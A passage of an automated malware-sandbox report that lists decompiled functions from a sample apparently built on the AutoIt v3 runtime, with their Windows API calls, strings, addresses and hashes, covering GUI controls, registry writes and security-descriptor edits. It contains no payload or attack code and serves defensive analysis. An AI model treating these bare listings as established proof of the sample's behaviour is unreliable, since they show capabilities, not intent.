Part of subcall function 007C223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007C2258
Part of subcall function 007C223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007C228A

Strings

DESELECT, xrefs: 007F059C
FINDITEM, xrefs: 007F0627
SELECTCLEAR, xrefs: 007F052D
SELECT, xrefs: 007F0548
VIEWCHANGE, xrefs: 007F0675
ISSELECTED, xrefs: 007F04DD
GETSELECTEDCOUNT, xrefs: 007F0470, 007F048B
GETITEMCOUNT, xrefs: 007F0316, 007F0337
SELECTALL, xrefs: 007F0515
GETSUBITEMCOUNT, xrefs: 007F0384, 007F039F
@U=u, xrefs: 007F04C5, 007F0504
GETTEXT, xrefs: 007F03EC, 007F0407
GETSELECTED, xrefs: 007F05E1
SELECTINVERT, xrefs: 007F057E

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-1753161424
Opcode ID: cf4f969b87acee1fb7603eb4a06750a7415fb57673b3a5ca5b974ea0187539d0
Instruction ID: ad21a001d65ede46e45a1c30c6446365f42fc1b9dd732e3becc6eb24b3ca61c7
Opcode Fuzzy Hash: cf4f969b87acee1fb7603eb4a06750a7415fb57673b3a5ca5b974ea0187539d0
Instruction Fuzzy Hash: 88E1BC31208245CFCB14DF24C55497AB3E6BF88314B14895DFA96EB3A2DB38ED85CB81

Function 007F0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 007F1128
GetDesktopWindow.USER32 ref: 007F113D
GetWindowRect.USER32(00000000), ref: 007F1144
GetWindowLongW.USER32(?,000000F0), ref: 007F1199
DestroyWindow.USER32(?), ref: 007F11B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007F11ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007F120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007F121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 007F1232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 007F1245
IsWindowVisible.USER32(00000000), ref: 007F12A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 007F12BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 007F12D0
GetWindowRect.USER32(00000000,?), ref: 007F12E8
MonitorFromPoint.USER32(?,?,00000002), ref: 007F130E
GetMonitorInfoW.USER32(00000000,?), ref: 007F1328
CopyRect.USER32(?,?), ref: 007F133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 007F13AA

Strings

0, xrefs: 007F10D3
(, xrefs: 007F131B
tooltips_class32, xrefs: 007F11E6

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 5935befebe474a09e5f7a23f5cd4e9d7c74053be73eac35fdb525d04e3ebf3eb
Instruction ID: 4cef964b3305854ac35c8742f007ee4767e4d67264d2d094890dcd1c97ccce0b
Opcode Fuzzy Hash: 5935befebe474a09e5f7a23f5cd4e9d7c74053be73eac35fdb525d04e3ebf3eb
Instruction Fuzzy Hash: 20B1AE71608345EFD704DF64C988B6ABBE4FF88350F40891CFA9A9B261DB75E844CB91

Function 00778891 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00778968
GetSystemMetrics.USER32(00000007), ref: 00778970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0077899B
GetSystemMetrics.USER32(00000008), ref: 007789A3
GetSystemMetrics.USER32(00000004), ref: 007789C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007789E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007789F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00778A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00778A3C
GetClientRect.USER32(00000000,000000FF), ref: 00778A5A
GetStockObject.GDI32(00000011), ref: 00778A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00778A81

Part of subcall function 0077912D: GetCursorPos.USER32(?), ref: 00779141
Part of subcall function 0077912D: ScreenToClient.USER32(00000000,?), ref: 0077915E
Part of subcall function 0077912D: GetAsyncKeyState.USER32(00000001), ref: 00779183
Part of subcall function 0077912D: GetAsyncKeyState.USER32(00000002), ref: 0077919D

SetTimer.USER32(00000000,00000000,00000028,007790FC), ref: 00778AA8

Strings

AutoIt v3 GUI, xrefs: 00778A20
@U=u, xrefs: 00778A81

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: @U=u$AutoIt v3 GUI
API String ID: 1458621304-2077007950
Opcode ID: 556d280eb901679086bd092909532096fd69f6649fd8dbbfdd7642b059a25732
Instruction ID: e8cc0d4d278c8e7f8e2081748af1800d74343363a26404630ddf03b95568fcb8
Opcode Fuzzy Hash: 556d280eb901679086bd092909532096fd69f6649fd8dbbfdd7642b059a25732
Instruction Fuzzy Hash: 9EB17B71A00209DFDF14DFA8CD49BAA7BB5FB48714F108129FA15AB290DB38A840CF55

Function 007C5A1B Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 007C5A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007C5A40
SetWindowTextW.USER32(?,?), ref: 007C5A57
GetDlgItem.USER32(?,000003EA), ref: 007C5A6C
SetWindowTextW.USER32(00000000,?), ref: 007C5A72
GetDlgItem.USER32(?,000003E9), ref: 007C5A82
SetWindowTextW.USER32(00000000,?), ref: 007C5A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 007C5AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 007C5AC3
GetWindowRect.USER32(?,?), ref: 007C5ACC
_wcslen.LIBCMT ref: 007C5B33
SetWindowTextW.USER32(?,?), ref: 007C5B6F
GetDesktopWindow.USER32 ref: 007C5B75
GetWindowRect.USER32(00000000), ref: 007C5B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 007C5BD3
GetClientRect.USER32(?,?), ref: 007C5BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 007C5C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007C5C2F

Strings

@U=u, xrefs: 007C5A40

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID: @U=u
API String ID: 895679908-2594219639
Opcode ID: 64e484b2ab770cdf35c7307df860bb903abf17a0fe40cde32595e60ae6b400bc
Instruction ID: a757cdf15367bba8fd7a7a74b18d1369fc8952990e3be53cb7ae4499d9a5f2b1
Opcode Fuzzy Hash: 64e484b2ab770cdf35c7307df860bb903abf17a0fe40cde32595e60ae6b400bc
Instruction Fuzzy Hash: C5714A71900A09AFDB21DFA9CE85FAEBBF5FF48704F10461CE142A25A0D779B944CB54

Function 007F091E Relevance: 31.9, APIs: 6, Strings: 12, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007F09C6
_wcslen.LIBCMT ref: 007F0A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007F0A54
_wcslen.LIBCMT ref: 007F0A8A
_wcslen.LIBCMT ref: 007F0B06
_wcslen.LIBCMT ref: 007F0B81

Part of subcall function 0077F9F2: _wcslen.LIBCMT ref: 0077F9FD

Part of subcall function 007C2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007C2BFA

Strings

EXPAND, xrefs: 007F0BF8
CHECK, xrefs: 007F0A85, 007F0AA0
GETITEMCOUNT, xrefs: 007F0C1E
SELECT, xrefs: 007F0D11
@U=u, xrefs: 007F0A54
GETTEXT, xrefs: 007F0C97
GETSELECTED, xrefs: 007F0C4E
EXISTS, xrefs: 007F0B7C, 007F0B97
ISCHECKED, xrefs: 007F0CE1
UNCHECK, xrefs: 007F0D3E
GETTOTALCOUNT, xrefs: 007F09F2, 007F0A17
COLLAPSE, xrefs: 007F0B01, 007F0B1C

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-383632319
Opcode ID: a34c8c5db017998f2db2db5f0cabf0d0505a6d97893ef7d0feef4b97d2d68f45
Instruction ID: f161bf900b9978b0fc0d0eb9db7ad2fb25490a72a85ed19609b38575d81341b5
Opcode Fuzzy Hash: a34c8c5db017998f2db2db5f0cabf0d0505a6d97893ef7d0feef4b97d2d68f45
Instruction Fuzzy Hash: 40E18835208305DFCB14DF24C45493AB7E2BF98358B14899DF99AAB3A2D738ED45CB81

Function 007C0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007C10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C1114
Part of subcall function 007C10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,007C0B9B,?,?,?), ref: 007C1120
Part of subcall function 007C10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007C0B9B,?,?,?), ref: 007C112F
Part of subcall function 007C10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007C0B9B,?,?,?), ref: 007C1136
Part of subcall function 007C10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007C0DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007C0E29
GetLengthSid.ADVAPI32(?), ref: 007C0E40
GetAce.ADVAPI32(?,00000000,?), ref: 007C0E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007C0E96
GetLengthSid.ADVAPI32(?), ref: 007C0EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 007C0EB5
HeapAlloc.KERNEL32(00000000), ref: 007C0EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 007C0EDD
CopySid.ADVAPI32(00000000), ref: 007C0EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007C0F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007C0F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 007C0F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 007C0F6E
HeapFree.KERNEL32(00000000), ref: 007C0F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 007C0F7E
HeapFree.KERNEL32(00000000), ref: 007C0F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 007C0F8E
HeapFree.KERNEL32(00000000), ref: 007C0F95
GetProcessHeap.KERNEL32(00000000,?), ref: 007C0FA1
HeapFree.KERNEL32(00000000), ref: 007C0FA8

Part of subcall function 007C1193: GetProcessHeap.KERNEL32(00000008,007C0BB1,?,00000000,?,007C0BB1,?), ref: 007C11A1
Part of subcall function 007C1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,007C0BB1,?), ref: 007C11A8
Part of subcall function 007C1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,007C0BB1,?), ref: 007C11B7

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 45018626a1bb57833ddb857ddf37099f1010e5344f58c2f4ebf9cbdf952e11b9
Instruction ID: dd29ca3f0fa496de5e329d7f12edf842008cdbbcbcea1fb27dcc4ec1d5c8ec69
Opcode Fuzzy Hash: 45018626a1bb57833ddb857ddf37099f1010e5344f58c2f4ebf9cbdf952e11b9
Instruction Fuzzy Hash: CF715C7290020AEBDF219FA4DD49FBEBBB8BF05300F04811DF919E6191D7399A55CBA0

Function 007F833C Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007F835A
_wcslen.LIBCMT ref: 007F836E
_wcslen.LIBCMT ref: 007F8391
_wcslen.LIBCMT ref: 007F83B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007F83F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,007F361A,?), ref: 007F844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007F8487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007F84CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007F8501
FreeLibrary.KERNEL32(?), ref: 007F850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007F851D
DestroyIcon.USER32(?), ref: 007F852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007F8549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007F8555

Strings

.icl, xrefs: 007F8368
.dll, xrefs: 007F83AB
@U=u, xrefs: 007F8535
.exe, xrefs: 007F8388

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl$@U=u
API String ID: 799131459-1639919054
Opcode ID: 96c9c7caf3d78c87e615863cf0ac8948421d2a6494d0349162168f171a641f96
Instruction ID: 74e6eb0fac58f0bbf0ea0231e9d21c7f0d1dc0551c5cd412e13ef64ca8e1ab1e
Opcode Fuzzy Hash: 96c9c7caf3d78c87e615863cf0ac8948421d2a6494d0349162168f171a641f96
Instruction Fuzzy Hash: 9761F27154021AFBEB14DF64CC45BBE77A8FF04B20F108509F915D62D1DBB8A990C7A0

Function 007EC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007EC4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,007FCC08,00000000,?,00000000,?,?), ref: 007EC544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 007EC5A4
_wcslen.LIBCMT ref: 007EC5F4
_wcslen.LIBCMT ref: 007EC66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 007EC6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 007EC7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 007EC84D
RegCloseKey.ADVAPI32(?), ref: 007EC881
RegCloseKey.ADVAPI32(00000000), ref: 007EC88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 007EC960

Strings

REG_QWORD, xrefs: 007EC8C3
REG_EXPAND_SZ, xrefs: 007EC5CD
REG_BINARY, xrefs: 007EC913
REG_SZ, xrefs: 007EC644
REG_MULTI_SZ, xrefs: 007EC6F5
REG_DWORD, xrefs: 007EC804

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: aba4d2d05bdb20905c89a2cc31899812976be008603768f7c2ea900530caee9c
Instruction ID: cd35943119612fb305aa7a2ff701dd5bc04c49dd56622cf5ccbca150930ab275
Opcode Fuzzy Hash: aba4d2d05bdb20905c89a2cc31899812976be008603768f7c2ea900530caee9c
Instruction Fuzzy Hash: AE126735204241DFD716DF15C885A2AB7E5EF88714F14889DF88A9B3A2DB39FD42CB81

Function 007EC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,007EB6AE,?,?), ref: 007EC9B5
_wcslen.LIBCMT ref: 007EC9F1
_wcslen.LIBCMT ref: 007ECA68
_wcslen.LIBCMT ref: 007ECA9E
_wcslen.LIBCMT ref: 007ECAF9
_wcslen.LIBCMT ref: 007ECB2F
_wcslen.LIBCMT ref: 007ECB7F

Strings

HKCC, xrefs: 007ECBAC
HKCR, xrefs: 007ECB29, 007ECB2E
HKU, xrefs: 007ECBF0
HKEY_CLASSES_ROOT, xrefs: 007ECAF3, 007ECAF8
HKLM, xrefs: 007ECA98, 007ECA9D
HKEY_USERS, xrefs: 007ECBDF
HKEY_CURRENT_USER, xrefs: 007ECBBD
HKEY_LOCAL_MACHINE, xrefs: 007ECA62, 007ECA67
HKCU, xrefs: 007ECBCE
HKEY_CURRENT_CONFIG, xrefs: 007ECB79, 007ECB7E

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: d536979a00157ef606c862e5c1ec77f32d927b8dc3a63142686aa596652c4476
Instruction ID: 9bae8768ae60f69510816327682f04282073605c6b56cab2dd9fc4dbfc8e3345
Opcode Fuzzy Hash: d536979a00157ef606c862e5c1ec77f32d927b8dc3a63142686aa596652c4476
Instruction Fuzzy Hash: AC714B766011AA8BCB22DE7ECD415BF3395AF68754B204134FC66E7284E63CDD86C3A0

Function 00767778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#pragma compile, xrefs: 007677D3
#requireadmin, xrefs: 007677FF
#include, xrefs: 00767847
#include-once, xrefs: 0076782F
", xrefs: 007A5153
#cs, xrefs: 00767873, 007678C5
#notrayicon, xrefs: 007677E7
Unterminated group of comments, xrefs: 007A528C
#OnAutoItStartRegister, xrefs: 00767817
Bad directive syntax error, xrefs: 007A519A
#comments-start, xrefs: 0076785F, 007678B1
', xrefs: 007A5169
#ce, xrefs: 007678ED
#comments-end, xrefs: 007678D9
Cannot parse #include, xrefs: 007A5279

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: ac4a34abebac9053833ebdfc06868c1bf18d167b66eab397353771f775c8360f
Instruction ID: 39c0f8f083614740201adbe7204402ee8d353e9333b6f25fd20887f33d970a16
Opcode Fuzzy Hash: ac4a34abebac9053833ebdfc06868c1bf18d167b66eab397353771f775c8360f
Instruction Fuzzy Hash: DB81D1B1644209EBDB25AF60CC46FBE37A8BF55344F144024FE06AB292EB7C9911C7A1

Function 007F856F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 007F8592
GetFileSize.KERNEL32(00000000,00000000), ref: 007F85A2
GlobalAlloc.KERNEL32(00000002,00000000), ref: 007F85AD
CloseHandle.KERNEL32(00000000), ref: 007F85BA
GlobalLock.KERNEL32(00000000), ref: 007F85C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 007F85D7
GlobalUnlock.KERNEL32(00000000), ref: 007F85E0
CloseHandle.KERNEL32(00000000), ref: 007F85E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 007F85F8
OleLoadPicture.OLEAUT32(?,00000000,00000000,007FFC38,?), ref: 007F8611
GlobalFree.KERNEL32(00000000), ref: 007F8621
GetObjectW.GDI32(?,00000018,000000FF), ref: 007F8641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 007F8671
DeleteObject.GDI32(00000000), ref: 007F8699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007F86AF

Strings

@U=u, xrefs: 007F86AF

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID: @U=u
API String ID: 3840717409-2594219639
Opcode ID: 2dc84a27a137528be698d529991fc4f2ff68d5930dfc245944e50e3d9ae4d5fa
Instruction ID: 8bd78d76cca2affd9d772f6f653c065ab8ff6c6ec54447c73274e52afc18e619
Opcode Fuzzy Hash: 2dc84a27a137528be698d529991fc4f2ff68d5930dfc245944e50e3d9ae4d5fa
Instruction Fuzzy Hash: E3410775600208EFDB12DFA5CD48EBA7BB8FF89B51F108058F905EB260DB389901DB65

Function 007800C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 007800C6

Part of subcall function 007800ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0083070C,00000FA0,5A3D729B,?,?,?,?,007A23B3,000000FF), ref: 0078011C
Part of subcall function 007800ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,007A23B3,000000FF), ref: 00780127
